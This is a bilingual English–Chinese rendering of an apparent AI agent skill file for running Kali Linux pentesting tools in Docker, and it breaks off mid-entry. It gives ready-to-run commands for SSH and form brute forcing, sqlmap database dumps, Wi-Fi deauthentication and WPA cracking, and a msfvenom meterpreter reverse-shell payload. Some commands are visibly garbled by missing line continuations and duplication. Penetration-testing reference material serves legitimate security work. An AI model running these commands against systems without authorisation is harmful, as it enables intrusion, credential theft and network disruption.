kali
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseKali Docker Pentesting Skill
Kali Docker渗透测试技能
Overview
概述
This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via , making it 70% more token-efficient.
bash_tool本技能可让你便捷访问集成了200+款渗透测试工具的Kali Linux Docker容器。无需使用MCP服务器,通过即可直接执行命令,令牌效率提升70%。
bash_tool📁 DATA PERSISTENCE & OUTPUT LOGGING (CRITICAL)
📁 数据持久化与输出日志(至关重要)
Volume Mount Structure
卷挂载结构
The container has two persistent volumes that sync with the host:
HOST CONTAINER
./shared/ <---> /home/kaliuser/shared/
./wordlists/ <---> /home/kaliuser/wordlists/容器包含两个与主机同步的持久化卷:
HOST CONTAINER
./shared/ <---> /home/kaliuser/shared/
./wordlists/ <---> /home/kaliuser/wordlists/MANDATORY OUTPUT RULE
强制输出规则
⚠️ CRITICAL: ALL scan results, outputs, and findings MUST be saved to
/home/kaliuser/shared/This ensures:
- ✅ Data persists after container restart
- ✅ Results are immediately available on host in
./shared/ - ✅ Complete audit trail for all activities
- ✅ Easy access for reporting and analysis
⚠️ 至关重要:所有扫描结果、输出内容和检测发现必须保存到
/home/kaliuser/shared/这可确保:
- ✅ 容器重启后数据仍保留
- ✅ 结果可立即在主机的目录中获取
./shared/ - ✅ 所有操作都有完整的审计追踪
- ✅ 便于报告生成与分析
Output Organization Best Practices
输出组织最佳实践
1. Use Timestamps in Filenames
1. 文件名中使用时间戳
bash
undefinedbash
undefinedGenerate timestamp
Generate timestamp
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
Save with timestamp
Save with timestamp
docker exec kali nmap -sV 192.168.1.1 -oA /home/kaliuser/shared/nmap_scan_$TIMESTAMP
undefineddocker exec kali nmap -sV 192.168.1.1 -oA /home/kaliuser/shared/nmap_scan_$TIMESTAMP
undefined2. Organize by Tool/Category
2. 按工具/类别组织
bash
undefinedbash
undefinedCreate organized directory structure
Create organized directory structure
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,gobuster,nikto,sqlmap,hydra,john,metasploit,wireless,forensics}
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,gobuster,nikto,sqlmap,hydra,john,metasploit,wireless,forensics}
Save to organized locations
Save to organized locations
docker exec kali nmap -sV target.com -oA /home/kaliuser/shared/nmap/scan_$(date +%Y%m%d_%H%M%S)
docker exec kali gobuster dir -u http://target.com -w /wordlist -o /home/kaliuser/shared/gobuster/target_$(date +%Y%m%d_%H%M%S).txt
undefineddocker exec kali nmap -sV target.com -oA /home/kaliuser/shared/nmap/scan_$(date +%Y%m%d_%H%M%S)
docker exec kali gobuster dir -u http://target.com -w /wordlist -o /home/kaliuser/shared/gobuster/target_$(date +%Y%m%d_%H%M%S).txt
undefined3. Standard Naming Convention
3. 标准命名规范
FORMAT: {tool}_{target}_{type}_{timestamp}.{ext}
EXAMPLES:
- nmap_192.168.1.1_full_20260125_143022.xml
- gobuster_example.com_dirs_20260125_143022.txt
- nikto_target.com_vuln_20260125_143022.txt
- hydra_ssh_192.168.1.10_20260125_143022.txt
- john_hashes_cracked_20260125_143022.txtFORMAT: {tool}_{target}_{type}_{timestamp}.{ext}
EXAMPLES:
- nmap_192.168.1.1_full_20260125_143022.xml
- gobuster_example.com_dirs_20260125_143022.txt
- nikto_target.com_vuln_20260125_143022.txt
- hydra_ssh_192.168.1.10_20260125_143022.txt
- john_hashes_cracked_20260125_143022.txtBuilt-in Wordlists vs Custom Wordlists
内置字典与自定义字典
Built-in Wordlists (Use Directly - No Mount Needed)
内置字典(直接使用 - 无需挂载)
bash
undefinedbash
undefinedPre-installed wordlists in container:
Pre-installed wordlists in container:
/usr/share/wordlists/rockyou.txt # Most popular passwords (needs extraction)
/usr/share/wordlists/dirb/common.txt # Common directories
/usr/share/seclists/ # Full SecLists collection
/usr/share/wordlists/metasploit/ # Metasploit wordlists
/usr/share/wordlists/rockyou.txt # Most popular passwords (needs extraction)
/usr/share/wordlists/dirb/common.txt # Common directories
/usr/share/seclists/ # Full SecLists collection
/usr/share/wordlists/metasploit/ # Metasploit wordlists
Extract rockyou (one-time operation)
Extract rockyou (one-time operation)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
Use built-in wordlists
Use built-in wordlists
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target
undefineddocker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target
undefinedCustom Wordlists (Save to Volume)
自定义字典(保存到卷中)
bash
undefinedbash
undefinedGenerate custom wordlist and save to mounted volume
Generate custom wordlist and save to mounted volume
docker exec kali crunch 6 8 -o /home/kaliuser/wordlists/custom_6-8.txt
docker exec kali cewl http://target.com -w /home/kaliuser/wordlists/target_words.txt
docker exec kali crunch 6 8 -o /home/kaliuser/wordlists/custom_6-8.txt
docker exec kali cewl http://target.com -w /home/kaliuser/wordlists/target_words.txt
Custom wordlists appear in ./wordlists/ on host
Custom wordlists appear in ./wordlists/ on host
undefinedundefinedComplete Logging Examples
完整日志示例
Network Scanning
网络扫描
bash
undefinedbash
undefinedCreate directory structure
Create directory structure
docker exec kali mkdir -p /home/kaliuser/shared/recon/$(date +%Y%m%d)
docker exec kali mkdir -p /home/kaliuser/shared/recon/$(date +%Y%m%d)
Host discovery with logging
Host discovery with logging
docker exec kali bash -c 'nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/host_discovery_$(date +%H%M%S)'
docker exec kali bash -c 'nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/host_discovery_$(date +%H%M%S)'
Port scan with logging
Port scan with logging
docker exec kali bash -c 'nmap -sV -p- 192.168.1.100 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/port_scan_192.168.1.100_$(date +%H%M%S)'
undefineddocker exec kali bash -c 'nmap -sV -p- 192.168.1.100 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/port_scan_192.168.1.100_$(date +%H%M%S)'
undefinedWeb Application Testing
Web应用测试
bash
undefinedbash
undefinedCreate web assessment directory
Create web assessment directory
docker exec kali mkdir -p /home/kaliuser/shared/web/target.com
docker exec kali mkdir -p /home/kaliuser/shared/web/target.com
Directory enumeration
Directory enumeration
docker exec kali gobuster dir -u http://target.com
-w /usr/share/wordlists/dirb/common.txt
-o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt
-w /usr/share/wordlists/dirb/common.txt
-o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt
docker exec kali gobuster dir -u http://target.com
-w /usr/share/wordlists/dirb/common.txt
-o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt
-w /usr/share/wordlists/dirb/common.txt
-o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt
Nikto scan
Nikto scan
docker exec kali nikto -h http://target.com
-o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt
-o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt
docker exec kali nikto -h http://target.com
-o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt
-o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt
SQL injection testing
SQL injection testing
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch
--output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)
--output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)
undefineddocker exec kali sqlmap -u "http://target.com/page?id=1" --batch
--output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)
--output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)
undefinedPassword Cracking
密码破解
bash
undefinedbash
undefinedCreate password cracking directory
Create password cracking directory
docker exec kali mkdir -p /home/kaliuser/shared/passwords
docker exec kali mkdir -p /home/kaliuser/shared/passwords
John the Ripper with logging
John the Ripper with logging
docker exec kali john /home/kaliuser/shared/passwords/hashes.txt
--wordlist=/usr/share/wordlists/rockyou.txt \
--wordlist=/usr/share/wordlists/rockyou.txt \
/home/kaliuser/shared/passwords/john_output_$(date +%Y%m%d_%H%M%S).txt
docker exec kali john /home/kaliuser/shared/passwords/hashes.txt
--wordlist=/usr/share/wordlists/rockyou.txt \
--wordlist=/usr/share/wordlists/rockyou.txt \
/home/kaliuser/shared/passwords/john_output_$(date +%Y%m%d_%H%M%S).txt
Hydra brute force with logging
Hydra brute force with logging
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt
ssh://192.168.1.10
-o /home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt
ssh://192.168.1.10
-o /home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt
undefineddocker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt
ssh://192.168.1.10
-o /home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt
ssh://192.168.1.10
-o /home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt
undefinedWireless Attacks
无线攻击
bash
undefinedbash
undefinedCreate wireless directory
Create wireless directory
docker exec kali mkdir -p /home/kaliuser/shared/wireless
docker exec kali mkdir -p /home/kaliuser/shared/wireless
Capture handshake
Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF
-w /home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S) wlan0mon
-w /home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S) wlan0mon
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF
-w /home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S) wlan0mon
-w /home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S) wlan0mon
Crack WPA
Crack WPA
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt
/home/kaliuser/shared/wireless/capture_*.cap
| tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt
/home/kaliuser/shared/wireless/capture_*.cap
| tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt
undefineddocker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt
/home/kaliuser/shared/wireless/capture_*.cap
| tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt
/home/kaliuser/shared/wireless/capture_*.cap
| tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt
undefinedExploitation & Payloads
漏洞利用与载荷生成
bash
undefinedbash
undefinedCreate payloads directory
Create payloads directory
docker exec kali mkdir -p /home/kaliuser/shared/payloads
docker exec kali mkdir -p /home/kaliuser/shared/payloads
Generate payload and save to shared volume
Generate payload and save to shared volume
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.100 LPORT=4444 -f exe
-o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe
LHOST=192.168.1.100 LPORT=4444 -f exe
-o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.100 LPORT=4444 -f exe
-o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe
LHOST=192.168.1.100 LPORT=4444 -f exe
-o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe
Metasploit resource file logging
Metasploit resource file logging
docker exec kali bash -c 'echo "spool /home/kaliuser/shared/payloads/msf_session_$(date +%Y%m%d_%H%M%S).log" > /tmp/msf.rc'
undefineddocker exec kali bash -c 'echo "spool /home/kaliuser/shared/payloads/msf_session_$(date +%Y%m%d_%H%M%S).log" > /tmp/msf.rc'
undefinedAccessing Results on Host
在主机上访问结果
bash
undefinedbash
undefinedView all saved results
View all saved results
ls -lh ./shared/
ls -lh ./shared/
View organized by date
View organized by date
tree ./shared/
tree ./shared/
Search for specific scan
Search for specific scan
find ./shared/ -name "nmap" -type f
find ./shared/ -name "nmap" -type f
Archive results
Archive results
tar -czf pentest_results_$(date +%Y%m%d).tar.gz ./shared/
undefinedtar -czf pentest_results_$(date +%Y%m%d).tar.gz ./shared/
undefinedQuick Reference: Output Flags by Tool
快速参考:各工具的输出参数
bash
undefinedbash
undefinedNmap
Nmap
-oN file.txt # Normal output
-oX file.xml # XML output
-oA basename # All formats (recommended)
-oN file.txt # Normal output
-oX file.xml # XML output
-oA basename # All formats (recommended)
Gobuster
Gobuster
-o file.txt # Output to file
-o file.txt # Output to file
Nikto
Nikto
-o file.txt # Output to file
-o file.txt # Output to file
SQLmap
SQLmap
--output-dir=path # Output directory
--output-dir=path # Output directory
Hydra
Hydra
-o file.txt # Output to file
-o file.txt # Output to file
John
John
file.txt # Redirect stdout
file.txt # Redirect stdout
Aircrack-ng
Aircrack-ng
-w /path/to/file # Output file (for airodump-ng)
-w /path/to/file # Output file (for airodump-ng)
Metasploit
Metasploit
spool file.log # Log session to file
---spool file.log # Log session to file
---Container Management
容器管理
Starting the Container
启动容器
The container is managed via docker-compose with automatic volume mounting:
bash
undefined容器通过docker-compose管理,自动挂载卷:
bash
undefinedStart with VPN (recommended for anonymized testing)
Start with VPN (recommended for anonymized testing)
docker-compose up -d
docker-compose up -d
Start without VPN (direct connection)
Start without VPN (direct connection)
docker-compose up -d kali
docker-compose up -d kali
Build from scratch
Build from scratch
docker-compose build
docker-compose build
Check status
Check status
docker-compose ps
**Volume mounts are automatic:**
- `./shared/` → `/home/kaliuser/shared/` (all scan results & outputs)
- `./wordlists/` → `/home/kaliuser/wordlists/` (custom wordlists only)docker-compose ps
**卷挂载自动完成:**
- `./shared/` → `/home/kaliuser/shared/`(所有扫描结果与输出)
- `./wordlists/` → `/home/kaliuser/wordlists/`(仅自定义字典)Running Commands
运行命令
bash
undefinedbash
undefinedExecute single command
Execute single command
docker exec kali [tool] [options]
docker exec kali [tool] [options]
Interactive shell
Interactive shell
docker exec -it kali /bin/bash
docker exec -it kali /bin/bash
Copy files out
Copy files out
docker cp kali:/home/kaliuser/shared/scan.txt ./output/
docker cp kali:/home/kaliuser/shared/scan.txt ./output/
Copy files in
Copy files in
docker cp ./wordlist.txt kali:/home/kaliuser/shared/
undefineddocker cp ./wordlist.txt kali:/home/kaliuser/shared/
undefinedContainer Lifecycle
容器生命周期
bash
undefinedbash
undefinedStop container
Stop container
docker stop kali
docker stop kali
Start existing container
Start existing container
docker start kali
docker start kali
Remove container
Remove container
docker rm kali
docker rm kali
View logs
View logs
docker logs kali
---docker logs kali
---Tool Catalog
工具目录
🔍 Network Discovery & Scanning
🔍 网络发现与扫描
nmap - Network Mapper
nmap - 网络映射器
Description: Industry-standard network scanner for host discovery, port scanning, and service detection.
Usage:
bash
undefined说明: 行业标准的网络扫描器,用于主机发现、端口扫描和服务检测。
用法:
bash
undefinedBasic scan
Basic scan
docker exec kali nmap 192.168.1.1
docker exec kali nmap 192.168.1.1
Service version detection
Service version detection
docker exec kali nmap -sV 192.168.1.1
docker exec kali nmap -sV 192.168.1.1
OS detection
OS detection
docker exec kali nmap -O 192.168.1.1
docker exec kali nmap -O 192.168.1.1
Comprehensive scan
Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1
docker exec kali nmap -sC -sV -O -p- 192.168.1.1
Save results (ALWAYS use /home/kaliuser/shared/)
Save results (ALWAYS use /home/kaliuser/shared/)
docker exec kali bash -c 'nmap -sV -oA /home/kaliuser/shared/nmap_scan_$(date +%Y%m%d_%H%M%S) 192.168.1.0/24'
**Common Options:**
- `-sS` - SYN stealth scan
- `-sT` - TCP connect scan
- `-sU` - UDP scan
- `-sV` - Version detection
- `-O` - OS detection
- `-A` - Aggressive scan (OS, version, scripts, traceroute)
- `-p-` - Scan all 65535 ports
- `-Pn` - Skip ping (assume host is up)
- `-T4` - Faster timing (0-5)
- `-oA` - Output all formatsdocker exec kali bash -c 'nmap -sV -oA /home/kaliuser/shared/nmap_scan_$(date +%Y%m%d_%H%M%S) 192.168.1.0/24'
**常用选项:**
- `-sS` - SYN隐蔽扫描
- `-sT` - TCP连接扫描
- `-sU` - UDP扫描
- `-sV` - 版本检测
- `-O` - 操作系统检测
- `-A` - 全面扫描(操作系统、版本、脚本、路由追踪)
- `-p-` - 扫描全部65535个端口
- `-Pn` - 跳过ping(假设主机存活)
- `-T4` - 更快的扫描速度(0-5级)
- `-oA` - 输出所有格式masscan - Fast Port Scanner
masscan - 快速端口扫描器
Description: Extremely fast port scanner, can scan the entire internet in under 6 minutes.
Usage:
bash
undefined说明: 极快的端口扫描器,可在6分钟内扫描整个互联网。
用法:
bash
undefinedScan specific ports
Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080
docker exec kali masscan 192.168.1.0/24 -p80,443,8080
Scan all ports fast
Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000
Save results
Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /home/kaliuser/shared/masscan.txt
undefineddocker exec kali masscan 10.0.0.0/8 -p80 -oL /home/kaliuser/shared/masscan.txt
undefinednetdiscover - Network Discovery
netdiscover - 网络发现工具
Description: Active/passive ARP reconnaissance tool.
Usage:
bash
undefined说明: 主动/被动ARP侦察工具。
用法:
bash
undefinedPassive mode
Passive mode
docker exec kali netdiscover -p -i eth0
docker exec kali netdiscover -p -i eth0
Active mode with range
Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24
undefineddocker exec kali netdiscover -r 192.168.1.0/24
undefinedarp-scan - ARP Scanner
arp-scan - ARP扫描器
Description: Discovers IPv4 hosts using ARP.
Usage:
bash
docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24说明: 使用ARP协议发现IPv4主机。
用法:
bash
docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24🌐 Web Application Testing
🌐 Web应用测试
nikto - Web Server Scanner
nikto - Web服务器扫描器
Description: Web server vulnerability scanner.
Usage:
bash
undefined说明: Web服务器漏洞扫描器。
用法:
bash
undefinedBasic scan
Basic scan
docker exec kali nikto -h http://target.com
docker exec kali nikto -h http://target.com
SSL scan
SSL scan
docker exec kali nikto -h https://target.com -ssl
docker exec kali nikto -h https://target.com -ssl
Save results
Save results
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt
Tuning options
Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde
undefineddocker exec kali nikto -h http://target.com -Tuning 123bde
undefineddirb - Directory Brute Forcer
dirb - 目录暴力破解工具
Description: Web content scanner.
Usage:
bash
undefined说明: Web内容扫描器。
用法:
bash
undefinedDefault wordlist
Default wordlist
docker exec kali dirb http://target.com
docker exec kali dirb http://target.com
Custom wordlist
Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt
Save results
Save results
docker exec kali dirb http://target.com -o /home/kaliuser/shared/dirb.txt
docker exec kali dirb http://target.com -o /home/kaliuser/shared/dirb.txt
Extensions
Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt
undefineddocker exec kali dirb http://target.com -X .php,.html,.txt
undefinedgobuster - Directory/DNS Enumeration
gobuster - 目录/DNS枚举工具
Description: Fast directory and DNS enumeration tool.
Usage:
bash
undefined说明: 快速的目录和DNS枚举工具。
用法:
bash
undefinedDirectory enumeration
Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
DNS subdomain enumeration
DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
Virtual host discovery
Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt
undefineddocker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt
undefinedwfuzz - Web Fuzzer
wfuzz - Web模糊测试工具
Description: Web application fuzzer.
Usage:
bash
undefined说明: Web应用模糊测试工具。
用法:
bash
undefinedDirectory fuzzing
Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ
Parameter fuzzing
Parameter fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ
POST data fuzzing
POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
undefineddocker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
undefinedsqlmap - SQL Injection Tool
sqlmap - SQL注入工具
Description: Automatic SQL injection and database takeover tool.
Usage:
bash
undefined说明: 自动化SQL注入与数据库接管工具。
用法:
bash
undefinedBasic test
Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"
docker exec kali sqlmap -u "http://target.com/page?id=1"
POST request
POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
Enumerate databases
Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs
Dump database
Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump
Full automation
Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all
undefineddocker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all
undefinedwpscan - WordPress Scanner
wpscan - WordPress扫描器
Description: WordPress vulnerability scanner.
Usage:
bash
undefined说明: WordPress漏洞扫描器。
用法:
bash
undefinedBasic scan
Basic scan
docker exec kali wpscan --url http://target.com
docker exec kali wpscan --url http://target.com
Enumerate users
Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u
docker exec kali wpscan --url http://target.com --enumerate u
Enumerate plugins
Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p
docker exec kali wpscan --url http://target.com --enumerate p
Aggressive scan
Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe
undefineddocker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe
undefinedwhatweb - Website Fingerprinting
whatweb - 网站指纹识别工具
Description: Identifies websites and web technologies.
Usage:
bash
undefined说明: 识别网站和Web技术栈。
用法:
bash
undefinedBasic scan
Basic scan
docker exec kali whatweb http://target.com
docker exec kali whatweb http://target.com
Aggressive mode
Aggressive mode
docker exec kali whatweb -a 3 http://target.com
docker exec kali whatweb -a 3 http://target.com
Scan multiple URLs
Scan multiple URLs
docker exec kali whatweb -i /home/kaliuser/shared/urls.txt
---docker exec kali whatweb -i /home/kaliuser/shared/urls.txt
---🔐 Password Attacks
🔐 密码攻击
john - John the Ripper
john - John the Ripper
Description: Fast password cracker.
Usage:
bash
undefined说明: 快速密码破解工具。
用法:
bash
undefinedCrack with default wordlist
Crack with default wordlist
docker exec kali john /home/kaliuser/shared/hashes.txt
docker exec kali john /home/kaliuser/shared/hashes.txt
Use rockyou wordlist
Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /home/kaliuser/shared/hashes.txt
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /home/kaliuser/shared/hashes.txt
Crack specific format
Crack specific format
docker exec kali john --format=raw-md5 /home/kaliuser/shared/hashes.txt
docker exec kali john --format=raw-md5 /home/kaliuser/shared/hashes.txt
Show cracked passwords
Show cracked passwords
docker exec kali john --show /home/kaliuser/shared/hashes.txt
docker exec kali john --show /home/kaliuser/shared/hashes.txt
Incremental mode
Incremental mode
docker exec kali john --incremental /home/kaliuser/shared/hashes.txt
undefineddocker exec kali john --incremental /home/kaliuser/shared/hashes.txt
undefinedhashcat - Advanced Password Recovery
hashcat - 高级密码恢复工具
Description: World's fastest password cracker.
Usage:
bash
undefined说明: 全球最快的密码破解工具。
用法:
bash
undefinedMD5 crack
MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
SHA256 crack
SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt
Brute force
Brute force
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
Show results
Show results
docker exec kali hashcat -m 0 hashes.txt --show
**Hash Modes:**
- 0 = MD5
- 100 = SHA1
- 1400 = SHA256
- 1700 = SHA512
- 1000 = NTLM
- 3200 = bcryptdocker exec kali hashcat -m 0 hashes.txt --show
**哈希模式:**
- 0 = MD5
- 100 = SHA1
- 1400 = SHA256
- 1700 = SHA512
- 1000 = NTLM
- 3200 = bcrypthydra - Network Password Cracker
hydra - 网络密码破解工具
Description: Fast network logon cracker.
Usage:
bash
undefined说明: 快速的网络登录破解工具。
用法:
bash
undefinedSSH brute force
SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
HTTP POST form
HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
FTP brute force
FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1
Multiple protocols
Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http
undefineddocker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http
undefinedmedusa - Parallel Password Cracker
medusa - 并行密码破解工具
Description: Speedy, parallel, modular login brute-forcer.
Usage:
bash
undefined说明: 高速、并行、模块化的登录暴力破解工具。
用法:
bash
undefinedSSH attack
SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh
HTTP basic auth
HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http
undefineddocker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http
undefinedcrunch - Wordlist Generator
crunch - 字典生成工具
Description: Generates custom wordlists.
Usage:
bash
undefined说明: 生成自定义字典。
用法:
bash
undefinedGenerate 6-8 character wordlist
Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /home/kaliuser/shared/wordlist.txt
docker exec kali crunch 6 8 -o /home/kaliuser/shared/wordlist.txt
Custom charset
Custom charset
docker exec kali crunch 4 6 0123456789 -o /home/kaliuser/shared/numbers.txt
docker exec kali crunch 4 6 0123456789 -o /home/kaliuser/shared/numbers.txt
Pattern-based
Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /home/kaliuser/shared/pattern.txt
---docker exec kali crunch 8 8 -t pass@@@@ -o /home/kaliuser/shared/pattern.txt
---📡 Wireless Security
📡 无线安全
aircrack-ng - WiFi Security Suite
aircrack-ng - WiFi安全套件
Description: Complete suite for assessing WiFi network security.
Usage:
bash
undefined说明: 用于评估WiFi网络安全的完整套件。
用法:
bash
undefinedStart monitor mode
Start monitor mode
docker exec kali airmon-ng start wlan0
docker exec kali airmon-ng start wlan0
Capture packets
Capture packets
docker exec kali airodump-ng wlan0mon
docker exec kali airodump-ng wlan0mon
Capture specific network
Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon
Deauth attack
Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Crack WPA handshake
Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap
undefineddocker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap
undefinedwifite - Automated Wireless Attack
wifite - 自动化无线攻击工具
Description: Automated wireless attack tool.
Usage:
bash
undefined说明: 自动化无线攻击工具。
用法:
bash
undefinedAutomatic WPA attack
Automatic WPA attack
docker exec kali wifite --wpa
docker exec kali wifite --wpa
All attack types
All attack types
